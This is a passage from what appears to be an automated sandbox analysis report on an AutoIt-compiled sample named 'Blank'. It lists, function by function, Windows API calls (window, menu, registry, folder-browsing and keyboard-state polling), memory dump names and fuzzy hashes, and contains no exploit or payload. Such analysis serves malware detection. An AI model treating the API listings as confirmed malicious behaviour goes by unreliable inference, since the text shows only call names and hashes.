                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0026347F
                                                                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 0026349C
                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002634AC
                                                                                                                                    • LoadIconW.USER32(000000A9), ref: 002634C2
                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002634D1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                                                    • Opcode ID: f633f2a3a5fbdd54a82a2cba7d393b567c5da81e4379746712df7859e9678307
                                                                                                                                    • Instruction ID: d061cf4d63df22b9a9a53a4044250227a2b73b55454eadd1bbd332e93f92bda1
                                                                                                                                    • Opcode Fuzzy Hash: f633f2a3a5fbdd54a82a2cba7d393b567c5da81e4379746712df7859e9678307
                                                                                                                                    • Instruction Fuzzy Hash: DC315871845309EFDB529FA4EC89AD9BBF4FF09320F10416EE580E62A1E7B50592CF91
                                                                                                                                    Function 00263411 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00263444
                                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 0026346E
                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0026347F
                                                                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 0026349C
                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002634AC
                                                                                                                                    • LoadIconW.USER32(000000A9), ref: 002634C2
                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002634D1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                                                    • Opcode ID: 51c92e41ae335e9f01ea6670b474c9b43c3d21f1351394b41014724dd41e3001
                                                                                                                                    • Instruction ID: 3778055049340ebf2f83fd232777b4f2f6de5f4b839de0a6004257d9f969cd2a
                                                                                                                                    • Opcode Fuzzy Hash: 51c92e41ae335e9f01ea6670b474c9b43c3d21f1351394b41014724dd41e3001
                                                                                                                                    • Instruction Fuzzy Hash: 4621E3B1915308AFEB11DFA4EC89BADBBF8FB08750F00416AF610A62A1D7B11541CF95
                                                                                                                                    Function 002CDBD0 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00264D37: __itow.LIBCMT ref: 00264D62
                                                                                                                                      • Part of subcall function 00264D37: __swprintf.LIBCMT ref: 00264DAC
                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 002CDC2D
                                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 002CDCC0
                                                                                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 002CDCD4
                                                                                                                                    • CoCreateInstance.OLE32(002F3D4C,00000000,00000001,0031B86C,?), ref: 002CDD20
                                                                                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 002CDD8F
                                                                                                                                    • CoTaskMemFree.OLE32(?,?), ref: 002CDDE7
                                                                                                                                    • _memset.LIBCMT ref: 002CDE24
                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 002CDE60
                                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 002CDE83
                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 002CDE8A
                                                                                                                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 002CDEC1
                                                                                                                                    • CoUninitialize.OLE32(00000001,00000000), ref: 002CDEC3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1246142700-0
                                                                                                                                    • Opcode ID: ef295ce8572fbe1e8f9756eb12185c436dcacb9fab218a6125d9fedf2a6372cd
                                                                                                                                    • Instruction ID: 0f9131df586894229f5d62dc6479fc6fc8178583e036fc42af9e7b10b3850240
                                                                                                                                    • Opcode Fuzzy Hash: ef295ce8572fbe1e8f9756eb12185c436dcacb9fab218a6125d9fedf2a6372cd
                                                                                                                                    • Instruction Fuzzy Hash: 7CB1FD75A10109AFDB04DFA4C888EAEBBF9FF48314B148569E909EB251DB30EE51CF50
                                                                                                                                    Function 002C081B Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetKeyboardState.USER32(?), ref: 002C0896
                                                                                                                                    • SetKeyboardState.USER32(?), ref: 002C0901
                                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 002C0921
                                                                                                                                    • GetKeyState.USER32(000000A0), ref: 002C0938
                                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 002C0967
                                                                                                                                    • GetKeyState.USER32(000000A1), ref: 002C0978
                                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 002C09A4
                                                                                                                                    • GetKeyState.USER32(00000011), ref: 002C09B2
                                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 002C09DB
                                                                                                                                    • GetKeyState.USER32(00000012), ref: 002C09E9
                                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 002C0A12
                                                                                                                                    • GetKeyState.USER32(0000005B), ref: 002C0A20
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 541375521-0
                                                                                                                                    • Opcode ID: 853157e2ab4ac1ec3ad946fec9092ef97548fdcbda78fe63f5a7a4ae08cf5811
                                                                                                                                    • Instruction ID: a54c6b7a4ee20a85ea24dc92121be54b760273fefcd884015fc8ee2d0ed5dca2
                                                                                                                                    • Opcode Fuzzy Hash: 853157e2ab4ac1ec3ad946fec9092ef97548fdcbda78fe63f5a7a4ae08cf5811
                                                                                                                                    • Instruction Fuzzy Hash: EB51FB20914785A9FB34DFB04895FEABFB49F01780F08879DD5C25B1C3DA649A6CCBA1
                                                                                                                                    Function 002BCE00 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 002BCE1C
                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 002BCE2E
                                                                                                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 002BCE8C
                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 002BCE97
                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 002BCEA9
                                                                                                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 002BCEFD
                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 002BCF0B
                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 002BCF1C
                                                                                                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 002BCF5F
                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 002BCF6D
                                                                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 002BCF8A
                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 002BCF97
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3096461208-0
                                                                                                                                    • Opcode ID: 54379b5b40a643ea9938abf181c118554e3bc36019bdb09e8b7b606fbd491736
                                                                                                                                    • Instruction ID: ec19d74ebebf64b180006ba44026792135400653b49c459498c3d830ab49eed7
                                                                                                                                    • Opcode Fuzzy Hash: 54379b5b40a643ea9938abf181c118554e3bc36019bdb09e8b7b606fbd491736
                                                                                                                                    • Instruction Fuzzy Hash: 72517E70B00205AFDB18CF68DD89ABEBBBAEB88750F148129F605D6291D770AD10CB10
                                                                                                                                    Function 002623F7 Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00261F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00262412,?,00000000,?,?,?,?,00261AA7,00000000,?), ref: 00261F76
                                                                                                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 002624AF
                                                                                                                                    • KillTimer.USER32(?,?,?,?,?,00261AA7,00000000,?,?,00261EBE,?,?), ref: 0026254A
                                                                                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 0029BFE7
                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00261AA7,00000000,?,?,00261EBE,?,?), ref: 0029C018
                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00261AA7,00000000,?,?,00261EBE,?,?), ref: 0029C02F
                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00261AA7,00000000,?,?,00261EBE,?,?), ref: 0029C04B
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0029C05D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 641708696-0
                                                                                                                                    • Opcode ID: f69ce0076a31dc18575579b82d7f239432fefe13390edaa3b99d63097128888f
                                                                                                                                    • Instruction ID: 928f43d4863c1a55e35b6aca23c628d98c34b03ad04ffb40c1bccf1a1f132283
                                                                                                                                    • Opcode Fuzzy Hash: f69ce0076a31dc18575579b82d7f239432fefe13390edaa3b99d63097128888f
                                                                                                                                    • Instruction Fuzzy Hash: 26619A30125A02DFDB369F18D98DB3AB7F1FB40322F60852CE44656A60CB75A8A5DF90
                                                                                                                                    Function 00262581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002629AB: GetWindowLongW.USER32(?,000000EB), ref: 002629BC
                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 002625AF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ColorLongWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 259745315-0
                                                                                                                                    • Opcode ID: bd6cbe959df3763407059105b782f07e82aa50ff91f1e90db182c2911714a172
                                                                                                                                    • Instruction ID: 0de775c1eb24f1832e2ef23d9d687214b19d7f9e4a4080134c7b559af155a024
                                                                                                                                    • Opcode Fuzzy Hash: bd6cbe959df3763407059105b782f07e82aa50ff91f1e90db182c2911714a172
                                                                                                                                    • Instruction Fuzzy Hash: 4141C030014940EBDF255F28EC8CBB93B69FB0A771F684265FD668A1E6C7708C95DB21
                                                                                                                                    Function 002729BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00280B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00272A3E,?,00008000), ref: 00280BA7
                                                                                                                                      • Part of subcall function 00280284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00272A58,?,00008000), ref: 002802A4
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00272ADF
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00272C2C
                                                                                                                                      • Part of subcall function 00273EBE: _wcscpy.LIBCMT ref: 00273EF6
                                                                                                                                      • Part of subcall function 0028386D: _iswctype.LIBCMT ref: 00283875
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                                    • API String ID: 537147316-3738523708
                                                                                                                                    • Opcode ID: a10284921ae0fedb4336eb7823d561d29c6e780f4ae7a4aefab500cbb2ef1d81
                                                                                                                                    • Instruction ID: c561eeb75f800af2c511d75fbd9994d552c7bd35b6e12e2c58ae1b74fd706aa2
                                                                                                                                    • Opcode Fuzzy Hash: a10284921ae0fedb4336eb7823d561d29c6e780f4ae7a4aefab500cbb2ef1d81
                                                                                                                                    • Instruction Fuzzy Hash: 5902C330128341DFC725EF24C991AAFBBE5AF99354F10891DF499932A2DB30D969CF42
                                                                                                                                    Function 00272FC5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002800CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00273094), ref: 002800ED
                                                                                                                                      • Part of subcall function 002808C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,0027309F), ref: 002808E3
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 002730E2
                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 002B01BA
                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 002B01FB
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 002B0239
                                                                                                                                    • _wcscat.LIBCMT ref: 002B0292
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                    • API String ID: 2673923337-2727554177
                                                                                                                                    • Opcode ID: e2ca596b61554ef7a7130960b7eb4b33d0c772ebdc17a1609308cd945e9cce24
                                                                                                                                    • Instruction ID: 32e722591728f2b77255e7785a90e03c3ec13318f9da7af403d8e1614e8f3821
                                                                                                                                    • Opcode Fuzzy Hash: e2ca596b61554ef7a7130960b7eb4b33d0c772ebdc17a1609308cd945e9cce24
                                                                                                                                    • Instruction Fuzzy Hash: 9D715D71426301DEC326EF69E8859ABBBACFF55340F40492EF549831A1EF309969CB52
                                                                                                                                    Function 00264D37 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __i64tow__itow__swprintf
                                                                                                                                    • String ID: %.15g$0x%p$False$True
                                                                                                                                    • API String ID: 421087845-2263619337
                                                                                                                                    • Opcode ID: 6e47388ca623d04a0808e0d39560d623b6009661c302dec2d91c22ceac12ec20
                                                                                                                                    • Instruction ID: 8f8354ed49274a5bb4fddf048efe6e85a62605d5da6bb05d528bb5aba313cf2a
                                                                                                                                    • Opcode Fuzzy Hash: 6e47388ca623d04a0808e0d39560d623b6009661c302dec2d91c22ceac12ec20
                                                                                                                                    • Instruction Fuzzy Hash: 6C41D675A3420AAFDF24EF78C841E7973E8EF44300F20446EE589D72D1EA719961DB11
                                                                                                                                    Function 002E7777 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 002E778F
                                                                                                                                    • CreateMenu.USER32 ref: 002E77AA
                                                                                                                                    • SetMenu.USER32(?,00000000), ref: 002E77B9
                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002E7846
                                                                                                                                    • IsMenu.USER32(?), ref: 002E785C
                                                                                                                                    • CreatePopupMenu.USER32 ref: 002E7866
                                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002E7893
                                                                                                                                    • DrawMenuBar.USER32 ref: 002E789B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                                    • String ID: 0$F
                                                                                                                                    • API String ID: 176399719-3044882817
                                                                                                                                    • Opcode ID: 631aea141711fe522924b1415c7b154f125f02ee2ff77f8f35b4ba114c3ca2dd
                                                                                                                                    • Instruction ID: a1b5c0776f2ccd7cc6a388c24d2b6a3a0777f78ede981fcb7786aff20312a54d
                                                                                                                                    • Opcode Fuzzy Hash: 631aea141711fe522924b1415c7b154f125f02ee2ff77f8f35b4ba114c3ca2dd
                                                                                                                                    • Instruction Fuzzy Hash: C6417BB4A10209EFDB20DF65E888AAABBF5FF59350F540029F905A7361C770A920DF50
                                                                                                                                    Function 002E7AE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 002E7B83
                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 002E7B8A
                                                                                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 002E7B9D
                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 002E7BA5
                                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 002E7BB0
                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 002E7BB9
                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 002E7BC3
                                                                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 002E7BD7
                                                                                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 002E7BE3
                                                                                                                                    Strings
